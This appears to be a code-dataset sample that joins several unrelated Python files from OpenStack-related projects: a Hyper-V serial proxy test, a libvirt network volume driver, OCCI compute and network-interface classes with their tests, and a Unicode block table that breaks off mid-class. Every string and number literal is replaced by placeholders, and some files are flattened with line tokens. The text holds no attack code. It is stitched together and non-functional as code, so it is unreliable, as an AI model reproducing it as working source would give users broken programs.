<s> import socket <EOL> import mock <EOL> from nova import exception <EOL> from nova . tests . unit . virt . hyperv import test_base <EOL> from nova . virt . hyperv import serialproxy <EOL> class SerialProxyTestCase ( test_base . HyperVBaseTestCase ) : <EOL> @ mock . patch . object ( socket , '<STR_LIT>' ) <EOL> def setUp ( self , mock_socket ) : <EOL> super ( SerialProxyTestCase , self ) . setUp ( ) <EOL> self . _mock_socket = mock_socket <EOL> self . _mock_input_queue = mock . Mock ( ) <EOL> self . _mock_output_queue = mock . Mock ( ) <EOL> self . _mock_client_connected = mock . Mock ( ) <EOL> threading_patcher = mock . patch . object ( serialproxy , '<STR_LIT>' ) <EOL> threading_patcher . start ( ) <EOL> self . addCleanup ( threading_patcher . stop ) <EOL> self . _proxy = serialproxy . SerialProxy ( <EOL> mock . sentinel . instance_nane , <EOL> mock . sentinel . host , <EOL> mock . sentinel . port , <EOL> self . _mock_input_queue , <EOL> self . _mock_output_queue , <EOL> self . _mock_client_connected ) <EOL> @ mock . patch . object ( socket , '<STR_LIT>' ) <EOL> def test_setup_socket_exception ( self , mock_socket ) : <EOL> fake_socket = mock_socket . return_value <EOL> fake_socket . listen . side_effect = socket . error <EOL> self . assertRaises ( exception . NovaException , <EOL> self . _proxy . _setup_socket ) <EOL> fake_socket . setsockopt . assert_called_once_with ( socket . SOL_SOCKET , <EOL> socket . SO_REUSEADDR , <EOL> <NUM_LIT:1> ) <EOL> fake_socket . bind . assert_called_once_with ( ( mock . sentinel . host , <EOL> mock . sentinel . port ) ) <EOL> def test_stop_serial_proxy ( self ) : <EOL> self . _proxy . _conn = mock . Mock ( ) <EOL> self . _proxy . _sock = mock . Mock ( ) <EOL> self . _proxy . stop ( ) <EOL> self . _proxy . _stopped . set . assert_called_once_with ( ) <EOL> self . _proxy . _client_connected . clear . assert_called_once_with ( ) <EOL> self . _proxy . _conn . shutdown . assert_called_once_with ( socket . SHUT_RDWR ) <EOL> self . 
_proxy . _conn . close . assert_called_once_with ( ) <EOL> self . _proxy . _sock . close . assert_called_once_with ( ) <EOL> @ mock . patch . object ( serialproxy . SerialProxy , '<STR_LIT>' ) <EOL> @ mock . patch . object ( serialproxy . SerialProxy , '<STR_LIT>' ) <EOL> def test_run ( self , mock_setup_socket , mock_accept_con ) : <EOL> self . _proxy . _stopped = mock . MagicMock ( ) <EOL> self . _proxy . _stopped . isSet . side_effect = [ False , True ] <EOL> self . _proxy . run ( ) <EOL> mock_setup_socket . assert_called_once_with ( ) <EOL> mock_accept_con . assert_called_once_with ( ) <EOL> def test_accept_connection ( self ) : <EOL> mock_conn = mock . Mock ( ) <EOL> self . _proxy . _sock = mock . Mock ( ) <EOL> self . _proxy . _sock . accept . return_value = [ <EOL> mock_conn , ( mock . sentinel . client_addr , mock . sentinel . client_port ) ] <EOL> self . _proxy . _accept_conn ( ) <EOL> self . _proxy . _client_connected . set . assert_called_once_with ( ) <EOL> mock_conn . close . assert_called_once_with ( ) <EOL> self . assertIsNone ( self . _proxy . _conn ) <EOL> thread = serialproxy . threading . Thread <EOL> for job in [ self . _proxy . _get_data , <EOL> self . _proxy . _send_data ] : <EOL> thread . assert_any_call ( target = job ) <EOL> def test_get_data ( self ) : <EOL> self . _mock_client_connected . isSet . return_value = True <EOL> self . _proxy . _conn = mock . Mock ( ) <EOL> self . _proxy . _conn . recv . side_effect = [ mock . sentinel . data , None ] <EOL> self . _proxy . _get_data ( ) <EOL> self . _mock_client_connected . clear . assert_called_once_with ( ) <EOL> self . _mock_input_queue . put . assert_called_once_with ( mock . sentinel . data ) <EOL> def _test_send_data ( self , exception = None ) : <EOL> self . _mock_client_connected . isSet . side_effect = [ True , False ] <EOL> self . _mock_output_queue . get_burst . return_value = mock . sentinel . data <EOL> self . _proxy . _conn = mock . Mock ( ) <EOL> self . _proxy . _conn . sendall . 
side_effect = exception <EOL> self . _proxy . _send_data ( ) <EOL> self . _proxy . _conn . sendall . assert_called_once_with ( <EOL> mock . sentinel . data ) <EOL> if exception : <EOL> self . _proxy . _client_connected . clear . assert_called_once_with ( ) <EOL> def test_send_data ( self ) : <EOL> self . _test_send_data ( ) <EOL> def test_send_data_exception ( self ) : <EOL> self . _test_send_data ( exception = socket . error ) </s>
<s> from oslo_config import cfg <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova import utils <EOL> from nova . virt . libvirt . volume import volume as libvirt_volume <EOL> volume_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_opts ( volume_opts , '<STR_LIT>' ) <EOL> class LibvirtNetVolumeDriver ( libvirt_volume . LibvirtBaseVolumeDriver ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , connection ) : <EOL> super ( LibvirtNetVolumeDriver , <EOL> self ) . __init__ ( connection , is_block_dev = False ) <EOL> def _get_secret_uuid ( self , conf , password = None ) : <EOL> secret = self . connection . _host . find_secret ( conf . source_protocol , <EOL> conf . source_name ) <EOL> if secret is None : <EOL> secret = self . connection . _host . create_secret ( conf . source_protocol , <EOL> conf . source_name , <EOL> password ) <EOL> return secret . UUIDString ( ) <EOL> def _delete_secret_by_name ( self , connection_info ) : <EOL> source_protocol = connection_info [ '<STR_LIT>' ] <EOL> netdisk_properties = connection_info [ '<STR_LIT:data>' ] <EOL> if source_protocol == '<STR_LIT>' : <EOL> return <EOL> elif source_protocol == '<STR_LIT>' : <EOL> usage_type = '<STR_LIT>' <EOL> usage_name = ( "<STR_LIT>" % <EOL> netdisk_properties ) <EOL> self . connection . _host . delete_secret ( usage_type , usage_name ) <EOL> def get_config ( self , connection_info , disk_info ) : <EOL> """<STR_LIT>""" <EOL> conf = super ( LibvirtNetVolumeDriver , <EOL> self ) . get_config ( connection_info , disk_info ) <EOL> netdisk_properties = connection_info [ '<STR_LIT:data>' ] <EOL> conf . source_type = "<STR_LIT>" <EOL> conf . source_protocol = connection_info [ '<STR_LIT>' ] <EOL> conf . source_name = netdisk_properties . get ( '<STR_LIT:name>' ) <EOL> conf . source_hosts = netdisk_properties . 
get ( '<STR_LIT>' , [ ] ) <EOL> conf . source_ports = netdisk_properties . get ( '<STR_LIT>' , [ ] ) <EOL> auth_enabled = netdisk_properties . get ( '<STR_LIT>' ) <EOL> if ( conf . source_protocol == '<STR_LIT>' and <EOL> CONF . libvirt . rbd_secret_uuid ) : <EOL> conf . auth_secret_uuid = CONF . libvirt . rbd_secret_uuid <EOL> auth_enabled = True <EOL> if CONF . libvirt . rbd_user : <EOL> conf . auth_username = CONF . libvirt . rbd_user <EOL> if conf . source_protocol == '<STR_LIT>' : <EOL> try : <EOL> conf . source_name = ( "<STR_LIT>" % <EOL> netdisk_properties ) <EOL> target_portal = netdisk_properties [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> raise exception . NovaException ( _ ( "<STR_LIT>" ) ) <EOL> ip , port = utils . parse_server_string ( target_portal ) <EOL> if ip == '<STR_LIT>' or port == '<STR_LIT>' : <EOL> raise exception . NovaException ( _ ( "<STR_LIT>" ) ) <EOL> conf . source_hosts = [ ip ] <EOL> conf . source_ports = [ port ] <EOL> if netdisk_properties . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> auth_enabled = True <EOL> conf . auth_secret_type = '<STR_LIT>' <EOL> password = netdisk_properties . get ( '<STR_LIT>' ) <EOL> conf . auth_secret_uuid = self . _get_secret_uuid ( conf , password ) <EOL> if auth_enabled : <EOL> conf . auth_username = ( conf . auth_username or <EOL> netdisk_properties [ '<STR_LIT>' ] ) <EOL> conf . auth_secret_type = ( conf . auth_secret_type or <EOL> netdisk_properties [ '<STR_LIT>' ] ) <EOL> conf . auth_secret_uuid = ( conf . auth_secret_uuid or <EOL> netdisk_properties [ '<STR_LIT>' ] ) <EOL> return conf <EOL> def disconnect_volume ( self , connection_info , disk_dev ) : <EOL> """<STR_LIT>""" <EOL> super ( LibvirtNetVolumeDriver , <EOL> self ) . disconnect_volume ( connection_info , disk_dev ) <EOL> self . _delete_secret_by_name ( connection_info ) </s>
import abc

import six

from ooi.log import log as logging

LOG = logging.getLogger(__name__)


@six.add_metaclass(abc.ABCMeta)
class Controller(object):
    """Abstract base class for request controllers.

    Subclasses implement the actual request handling; this base only
    stores the wrapped application and the OpenStack version string the
    controller should target.
    """

    def __init__(self, app, openstack_version):
        # The wrapped (WSGI-style) application — presumably used by
        # subclasses to forward requests; confirm against callers.
        self.app = app
        # OpenStack API version this controller talks to.
        self.openstack_version = openstack_version
from ooi.occi.core import action
from ooi.occi.core import attribute as attr
from ooi.occi.core import kind
from ooi.occi.core import resource
from ooi.occi import helpers

# The four OCCI compute actions, all built under the same (anonymized)
# scheme.
start = action.Action(helpers.build_scheme('<STR_LIT>'),
                      "<STR_LIT:start>", "<STR_LIT>")

stop = action.Action(helpers.build_scheme('<STR_LIT>'),
                     "<STR_LIT>", "<STR_LIT>")

restart = action.Action(helpers.build_scheme('<STR_LIT>'),
                        "<STR_LIT>", "<STR_LIT>")

suspend = action.Action(helpers.build_scheme('<STR_LIT>'),
                        "<STR_LIT>", "<STR_LIT>")


class ComputeResource(resource.Resource):
    """OCCI compute resource.

    Exposes architecture, cores, hostname, speed, memory and state as
    entries in the OCCI attribute collection, with Python properties
    proxying each one.  All but state are mutable; state is read-only
    and changes only through the declared actions.
    """

    attributes = attr.AttributeCollection(["<STR_LIT>",
                                           "<STR_LIT>",
                                           "<STR_LIT>",
                                           "<STR_LIT>",
                                           "<STR_LIT>",
                                           "<STR_LIT>"])

    actions = (start, stop, restart, suspend)

    kind = kind.Kind(helpers.build_scheme('<STR_LIT>'), '<STR_LIT>',
                     '<STR_LIT>', attributes, '<STR_LIT>',
                     actions=actions,
                     related=[resource.Resource.kind])

    def __init__(self, title, summary=None, id=None, architecture=None,
                 cores=None, hostname=None, speed=None, memory=None,
                 state=None, mixins=None):
        # FIX: the original signature used ``mixins=[]`` — a mutable
        # default evaluated once and shared across every call, so mixins
        # appended by/for one instance could leak into later instances.
        # ``None`` is the safe sentinel; explicit callers are unaffected.
        if mixins is None:
            mixins = []
        super(ComputeResource, self).__init__(title, mixins, summary=summary,
                                              id=id)
        self.attributes["<STR_LIT>"] = attr.MutableAttribute(
            "<STR_LIT>", architecture)
        self.attributes["<STR_LIT>"] = attr.MutableAttribute(
            "<STR_LIT>", cores)
        self.attributes["<STR_LIT>"] = attr.MutableAttribute(
            "<STR_LIT>", hostname)
        self.attributes["<STR_LIT>"] = attr.MutableAttribute(
            "<STR_LIT>", speed)
        self.attributes["<STR_LIT>"] = attr.MutableAttribute(
            "<STR_LIT>", memory)
        # Read-only; NOTE: the upstream class name really is spelled
        # "InmutableAttribute".
        self.attributes["<STR_LIT>"] = attr.InmutableAttribute(
            "<STR_LIT>", state)

    # Convenience properties proxying the OCCI attribute collection.

    @property
    def architecture(self):
        return self.attributes["<STR_LIT>"].value

    @architecture.setter
    def architecture(self, value):
        self.attributes["<STR_LIT>"].value = value

    @property
    def cores(self):
        return self.attributes["<STR_LIT>"].value

    @cores.setter
    def cores(self, value):
        self.attributes["<STR_LIT>"].value = value

    @property
    def hostname(self):
        return self.attributes["<STR_LIT>"].value

    @hostname.setter
    def hostname(self, value):
        self.attributes["<STR_LIT>"].value = value

    @property
    def speed(self):
        return self.attributes["<STR_LIT>"].value

    @speed.setter
    def speed(self, value):
        self.attributes["<STR_LIT>"].value = value

    @property
    def memory(self):
        return self.attributes["<STR_LIT>"].value

    @memory.setter
    def memory(self, value):
        self.attributes["<STR_LIT>"].value = value

    @property
    def state(self):
        # Read-only: no setter by design.
        return self.attributes["<STR_LIT>"].value
import copy
import uuid

from ooi.tests import fakes
from ooi.tests.middleware import test_middleware
from ooi import utils


class TestNetInterfaceController(test_middleware.TestMiddleware):
    """Middleware tests for the network-interface link controller.

    Exercises listing, showing, creating and deleting compute/network
    links against the fake OpenStack backend in ``ooi.tests.fakes``.
    All URL templates, category headers and status codes are anonymized
    placeholders in this corpus.
    """

    def test_list_ifaces_empty(self):
        # Tenant "bar" has no floating IPs: expect an empty listing.
        tenant = fakes.tenants["<STR_LIT:bar>"]
        app = self.get_app()
        for url in ("<STR_LIT>", "<STR_LIT>"):
            req = self._build_req(url, tenant["<STR_LIT:id>"], method="<STR_LIT:GET>")
            req.environ["<STR_LIT>"] = tenant["<STR_LIT:id>"]
            resp = req.get_response(app)
            expected_result = "<STR_LIT>"
            self.assertContentType(resp)
            self.assertExpectedResult(expected_result, resp)
            self.assertEqual(<NUM_LIT>, resp.status_code)

    def test_list_ifaces(self):
        # Listing returns one link per attached floating IP; the link id
        # is "<instance>_<ip>" joined with '_'.
        tenant = fakes.tenants["<STR_LIT>"]
        app = self.get_app()
        for url in ("<STR_LIT>", "<STR_LIT>"):
            req = self._build_req(url, tenant["<STR_LIT:id>"], method="<STR_LIT:GET>")
            resp = req.get_response(app)
            self.assertEqual(<NUM_LIT:200>, resp.status_code)
            expected = []
            for ip in fakes.floating_ips[tenant["<STR_LIT:id>"]]:
                if ip["<STR_LIT>"] is not None:
                    link_id = '<STR_LIT:_>'.join([ip["<STR_LIT>"], ip["<STR_LIT>"]])
                    expected.append(
                        ("<STR_LIT>",
                         utils.join_url(self.application_url + "<STR_LIT:/>",
                                        "<STR_LIT>" % link_id))
                    )
            self.assertExpectedResult(expected, resp)

    def test_show_iface(self):
        # Each attached floating IP can be shown individually and must
        # include the link attributes (source compute, target network).
        tenant = fakes.tenants["<STR_LIT>"]
        app = self.get_app()
        for ip in fakes.floating_ips[tenant["<STR_LIT:id>"]]:
            if ip["<STR_LIT>"] is not None:
                link_id = '<STR_LIT:_>'.join([ip["<STR_LIT>"], ip["<STR_LIT>"]])
                req = self._build_req("<STR_LIT>" % link_id,
                                      tenant["<STR_LIT:id>"], method="<STR_LIT:GET>")
                resp = req.get_response(app)
                self.assertContentType(resp)
                source = utils.join_url(self.application_url + "<STR_LIT:/>",
                                        "<STR_LIT>" % ip["<STR_LIT>"])
                target = utils.join_url(self.application_url + "<STR_LIT:/>",
                                        "<STR_LIT>")
                self.assertResultIncludesLinkAttr(link_id, source, target,
                                                  resp)
                self.assertEqual(<NUM_LIT:200>, resp.status_code)

    def test_show_invalid_id(self):
        # A random (malformed) link id yields an error status.
        tenant = fakes.tenants["<STR_LIT:foo>"]
        app = self.get_app()
        req = self._build_req("<STR_LIT>" % uuid.uuid4().hex,
                              tenant["<STR_LIT:id>"], method="<STR_LIT:GET>")
        resp = req.get_response(app)
        self.assertEqual(<NUM_LIT>, resp.status_code)

    def test_show_non_existant_compute(self):
        # Well-formed link id pointing at an unknown server.
        tenant = fakes.tenants["<STR_LIT:foo>"]
        app = self.get_app()
        req = self._build_req("<STR_LIT>" % uuid.uuid4().hex,
                              tenant["<STR_LIT:id>"], method="<STR_LIT:GET>")
        resp = req.get_response(app)
        self.assertEqual(<NUM_LIT>, resp.status_code)

    def test_show_non_existant_network(self):
        # Known server, but the network half of the link id is unknown.
        tenant = fakes.tenants["<STR_LIT:foo>"]
        server_id = fakes.servers[tenant["<STR_LIT:id>"]][<NUM_LIT:0>]["<STR_LIT:id>"]
        app = self.get_app()
        req = self._build_req("<STR_LIT>" % server_id,
                              tenant["<STR_LIT:id>"], method="<STR_LIT:GET>")
        resp = req.get_response(app)
        self.assertEqual(<NUM_LIT>, resp.status_code)

    def test_create_link_invalid_compute(self):
        # POST with a valid network target but no valid compute source.
        app = self.get_app()
        net_id = utils.join_url(self.application_url + "<STR_LIT:/>",
                                "<STR_LIT>")
        headers = {
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'),
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
            ) % net_id
        }
        req = self._build_req("<STR_LIT>", None, method="<STR_LIT:POST>",
                              headers=headers)
        resp = req.get_response(app)
        self.assertEqual(<NUM_LIT>, resp.status_code)

    def test_create_link_invalid_network(self):
        # POST with a valid compute source but no valid network target.
        app = self.get_app()
        server_id = utils.join_url(self.application_url + "<STR_LIT:/>",
                                   "<STR_LIT>")
        headers = {
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'),
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
            ) % server_id
        }
        req = self._build_req("<STR_LIT>", None, method="<STR_LIT:POST>",
                              headers=headers)
        resp = req.get_response(app)
        self.assertEqual(<NUM_LIT>, resp.status_code)

    def test_create_link_with_fixed(self):
        # Linking to the fixed network is rejected with an error status.
        tenant = fakes.tenants["<STR_LIT:foo>"]
        server_id = fakes.servers[tenant["<STR_LIT:id>"]][<NUM_LIT:0>]["<STR_LIT:id>"]
        server_url = utils.join_url(self.application_url + "<STR_LIT:/>",
                                    "<STR_LIT>" % server_id)
        net_url = utils.join_url(self.application_url + "<STR_LIT:/>", "<STR_LIT>")
        app = self.get_app()
        headers = {
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'),
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
            ) % (server_url, net_url)
        }
        req = self._build_req("<STR_LIT>", tenant["<STR_LIT:id>"], method="<STR_LIT:POST>",
                              headers=headers)
        resp = req.get_response(app)
        self.assertEqual(<NUM_LIT>, resp.status_code)

    def test_create_link_with_unexistant_net(self):
        # Linking a known server to an unknown network fails.
        tenant = fakes.tenants["<STR_LIT:foo>"]
        server_id = fakes.servers[tenant["<STR_LIT:id>"]][<NUM_LIT:0>]["<STR_LIT:id>"]
        server_url = utils.join_url(self.application_url + "<STR_LIT:/>",
                                    "<STR_LIT>" % server_id)
        net_url = utils.join_url(self.application_url + "<STR_LIT:/>",
                                 "<STR_LIT>")
        app = self.get_app()
        headers = {
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'),
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
            ) % (server_url, net_url)
        }
        req = self._build_req("<STR_LIT>", tenant["<STR_LIT:id>"], method="<STR_LIT:POST>",
                              headers=headers)
        resp = req.get_response(app)
        self.assertEqual(<NUM_LIT>, resp.status_code)

    def test_create_link_no_pool(self):
        # Successful link creation without naming a floating-IP pool;
        # the fake backend allocates ``fakes.allocated_ip``.
        tenant = fakes.tenants["<STR_LIT:foo>"]
        server_id = fakes.servers[tenant["<STR_LIT:id>"]][<NUM_LIT:0>]["<STR_LIT:id>"]
        server_url = utils.join_url(self.application_url + "<STR_LIT:/>",
                                    "<STR_LIT>" % server_id)
        net_url = utils.join_url(self.application_url + "<STR_LIT:/>",
                                 "<STR_LIT>")
        app = self.get_app()
        headers = {
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'),
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
            ) % (server_url, net_url)
        }
        req = self._build_req("<STR_LIT>", tenant["<STR_LIT:id>"], method="<STR_LIT:POST>",
                              headers=headers)
        resp = req.get_response(app)
        link_id = '<STR_LIT:_>'.join([server_id, fakes.allocated_ip])
        expected = [("<STR_LIT>",
                     utils.join_url(self.application_url + "<STR_LIT:/>",
                                    "<STR_LIT>" % link_id))]
        self.assertEqual(<NUM_LIT:200>, resp.status_code)
        self.assertExpectedResult(expected, resp)
        self.assertDefaults(resp)

    def test_create_link_with_pool(self):
        # Successful link creation naming an existing pool as a mixin.
        tenant = fakes.tenants["<STR_LIT:foo>"]
        server_id = fakes.servers[tenant["<STR_LIT:id>"]][<NUM_LIT:0>]["<STR_LIT:id>"]
        server_url = utils.join_url(self.application_url + "<STR_LIT:/>",
                                    "<STR_LIT>" % server_id)
        net_url = utils.join_url(self.application_url + "<STR_LIT:/>",
                                 "<STR_LIT>")
        pool_name = fakes.pools[tenant["<STR_LIT:id>"]][<NUM_LIT:0>]["<STR_LIT:name>"]
        app = self.get_app()
        headers = {
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>') % pool_name,
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
            ) % (server_url, net_url)
        }
        req = self._build_req("<STR_LIT>", tenant["<STR_LIT:id>"], method="<STR_LIT:POST>",
                              headers=headers)
        resp = req.get_response(app)
        link_id = '<STR_LIT:_>'.join([server_id, fakes.allocated_ip])
        expected = [("<STR_LIT>",
                     utils.join_url(self.application_url + "<STR_LIT:/>",
                                    "<STR_LIT>" % link_id))]
        self.assertEqual(<NUM_LIT:200>, resp.status_code)
        self.assertExpectedResult(expected, resp)
        self.assertDefaults(resp)

    def test_create_link_invalid_pool(self):
        # Naming a pool that does not exist yields an error status.
        tenant = fakes.tenants["<STR_LIT:foo>"]
        server_id = fakes.servers[tenant["<STR_LIT:id>"]][<NUM_LIT:0>]["<STR_LIT:id>"]
        server_url = utils.join_url(self.application_url + "<STR_LIT:/>",
                                    "<STR_LIT>" % server_id)
        net_url = utils.join_url(self.application_url + "<STR_LIT:/>",
                                 "<STR_LIT>")
        app = self.get_app()
        headers = {
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'),
            '<STR_LIT>': (
                '<STR_LIT>'
                '<STR_LIT>'
            ) % (server_url, net_url)
        }
        req = self._build_req("<STR_LIT>", tenant["<STR_LIT:id>"], method="<STR_LIT:POST>",
                              headers=headers)
        resp = req.get_response(app)
        self.assertEqual(<NUM_LIT>, resp.status_code)

    def test_delete_fixed(self):
        # Fixed-address links cannot be deleted: expect an error status
        # for every matching address on every server.
        tenant = fakes.tenants["<STR_LIT>"]
        app = self.get_app()
        for s in fakes.servers[tenant["<STR_LIT:id>"]]:
            # popitem() mutates, so iterate over a shallow copy.
            addresses = copy.copy(s.get("<STR_LIT>", {}))
            while addresses:
                addr_set = addresses.popitem()
                for addr in addr_set[<NUM_LIT:1>]:
                    if addr["<STR_LIT>"] == "<STR_LIT>":
                        link_id = '<STR_LIT:_>'.join([s["<STR_LIT:id>"], addr["<STR_LIT>"]])
                        req = self._build_req("<STR_LIT>" % link_id,
                                              tenant["<STR_LIT:id>"], method="<STR_LIT>")
                        resp = req.get_response(app)
                        self.assertContentType(resp)
                        self.assertEqual(<NUM_LIT>, resp.status_code)

    def test_delete_link(self):
        # Floating-address links delete successfully (same traversal as
        # above, different address-type filter and expected status).
        tenant = fakes.tenants["<STR_LIT>"]
        app = self.get_app()
        for s in fakes.servers[tenant["<STR_LIT:id>"]]:
            addresses = copy.copy(s.get("<STR_LIT>", {}))
            while addresses:
                addr_set = addresses.popitem()
                for addr in addr_set[<NUM_LIT:1>]:
                    if addr["<STR_LIT>"] == "<STR_LIT>":
                        link_id = '<STR_LIT:_>'.join([s["<STR_LIT:id>"], addr["<STR_LIT>"]])
                        req = self._build_req("<STR_LIT>" % link_id,
                                              tenant["<STR_LIT:id>"], method="<STR_LIT>")
                        resp = req.get_response(app)
                        self.assertContentType(resp)
                        self.assertEqual(<NUM_LIT>, resp.status_code)


class NetInterfaceControllerTextPlain(test_middleware.TestMiddlewareTextPlain,
                                      TestNetInterfaceController):
    """Run the same tests with text/plain rendering."""


class NetInterfaceControllerTextOcci(test_middleware.TestMiddlewareTextOcci,
                                     TestNetInterfaceController):
    """Run the same tests with text/occi rendering."""
<s> """<STR_LIT>""" <EOL> import six <EOL> import unicodedata <EOL> UNICODE_STARTING_CODEPOINT = <NUM_LIT> <EOL> UNICODE_ENDING_CODEPOINT = <NUM_LIT> <EOL> UNICODE_BLOCKS = None <EOL> UNICODE_PLANES = None <EOL> class PLANE_NAMES ( object ) : <EOL> """<STR_LIT>""" <EOL> basic_multilingual_plane = '<STR_LIT>' <EOL> supplementary_multilingual_plane = '<STR_LIT>' <EOL> supplementary_ideographic_plane = '<STR_LIT>' <EOL> unassigned = '<STR_LIT>' <EOL> supplementary_special_purpose_plane = '<STR_LIT>' <EOL> supplementary_private_use_area = '<STR_LIT>' <EOL> class BLOCK_NAMES ( object ) : <EOL> """<STR_LIT>""" <EOL> basic_latin = "<STR_LIT>" <EOL> c1_controls_and_latin_1_supplement = "<STR_LIT>" <EOL> latin_extended_a = "<STR_LIT>" <EOL> latin_extended_b = "<STR_LIT>" <EOL> ipa_extensions = "<STR_LIT>" <EOL> spacing_modifier_letters = "<STR_LIT>" <EOL> combining_diacritical_marks = "<STR_LIT>" <EOL> greek_coptic = "<STR_LIT>" <EOL> cyrillic = "<STR_LIT>" <EOL> cyrillic_supplement = "<STR_LIT>" <EOL> armenian = "<STR_LIT>" <EOL> hebrew = "<STR_LIT>" <EOL> arabic = "<STR_LIT>" <EOL> syriac = "<STR_LIT>" <EOL> undefined = "<STR_LIT>" <EOL> thaana = "<STR_LIT>" <EOL> devanagari = "<STR_LIT>" <EOL> bengali_assamese = "<STR_LIT>" <EOL> gurmukhi = "<STR_LIT>" <EOL> gujarati = "<STR_LIT>" <EOL> oriya = "<STR_LIT>" <EOL> tamil = "<STR_LIT>" <EOL> telugu = "<STR_LIT>" <EOL> kannada = "<STR_LIT>" <EOL> malayalam = "<STR_LIT>" <EOL> sinhala = "<STR_LIT>" <EOL> thai = "<STR_LIT>" <EOL> lao = "<STR_LIT>" <EOL> tibetan = "<STR_LIT>" <EOL> myanmar = "<STR_LIT>" <EOL> georgian = "<STR_LIT>" <EOL> hangul_jamo = "<STR_LIT>" <EOL> ethiopic = "<STR_LIT>" <EOL> cherokee = "<STR_LIT>" <EOL> unified_canadian_aboriginal_syllabics = ( <EOL> "<STR_LIT>" ) <EOL> ogham = "<STR_LIT>" <EOL> runic = "<STR_LIT>" <EOL> tagalog = "<STR_LIT>" <EOL> hanunoo = "<STR_LIT>" <EOL> buhid = "<STR_LIT>" <EOL> tagbanwa = "<STR_LIT>" <EOL> khmer = "<STR_LIT>" <EOL> mongolian = "<STR_LIT>" <EOL> limbu = "<STR_LIT>" 
<EOL> tai_le = "<STR_LIT>" <EOL> khmer_symbols = "<STR_LIT>" <EOL> phonetic_extensions = "<STR_LIT>" <EOL> latin_extended_additional = "<STR_LIT>" <EOL> greek_extended = "<STR_LIT>" <EOL> general_punctuation = "<STR_LIT>" <EOL> superscripts_and_subscripts = "<STR_LIT>" <EOL> currency_symbols = "<STR_LIT>" <EOL> combining_diacritical_marks_for_symbols = ( <EOL> "<STR_LIT>" ) <EOL> letterlike_symbols = "<STR_LIT>" <EOL> number_forms = "<STR_LIT>" <EOL> arrows = "<STR_LIT>" <EOL> mathematical_operators = "<STR_LIT>" <EOL> miscellaneous_technical = "<STR_LIT>" <EOL> control_pictures = "<STR_LIT>" <EOL> optical_character_recognition = "<STR_LIT>" <EOL> enclosed_alphanumerics = "<STR_LIT>" <EOL> box_drawing = "<STR_LIT>" <EOL> block_elements = "<STR_LIT>" <EOL> geometric_shapes = "<STR_LIT>" <EOL> miscellaneous_symbols = "<STR_LIT>" <EOL> dingbats = "<STR_LIT>" <EOL> miscellaneous_mathematical_symbols_a = ( <EOL> "<STR_LIT>" ) <EOL> supplemental_arrows_a = "<STR_LIT>" <EOL> braille_patterns = "<STR_LIT>" <EOL> supplemental_arrows_b = "<STR_LIT>" <EOL> miscellaneous_mathematical_symbols_b = ( <EOL> "<STR_LIT>" ) <EOL> supplemental_mathematical_operators = "<STR_LIT>" <EOL> miscellaneous_symbols_and_arrows = "<STR_LIT>" <EOL> cjk_radicals_supplement = "<STR_LIT>" <EOL> kangxi_radicals = "<STR_LIT>" <EOL> ideographic_description_characters = "<STR_LIT>" <EOL> cjk_symbols_and_punctuation = "<STR_LIT>" <EOL> hiragana = "<STR_LIT>" <EOL> katakana = "<STR_LIT>" <EOL> bopomofo = "<STR_LIT>" <EOL> hangul_compatibility_jamo = "<STR_LIT>" <EOL> kanbun_kunten = "<STR_LIT>" <EOL> bopomofo_extended = "<STR_LIT>" <EOL> katakana_phonetic_extensions = "<STR_LIT>" <EOL> enclosed_cjk_letters_and_months = "<STR_LIT>" <EOL> cjk_compatibility = "<STR_LIT>" <EOL> cjk_unified_ideographs_extension_a = "<STR_LIT>" <EOL> yijing_hexagram_symbols = "<STR_LIT>" <EOL> cjk_unified_ideographs = "<STR_LIT>" <EOL> yi_syllables = "<STR_LIT>" <EOL> yi_radicals = "<STR_LIT>" <EOL> hangul_syllables = 
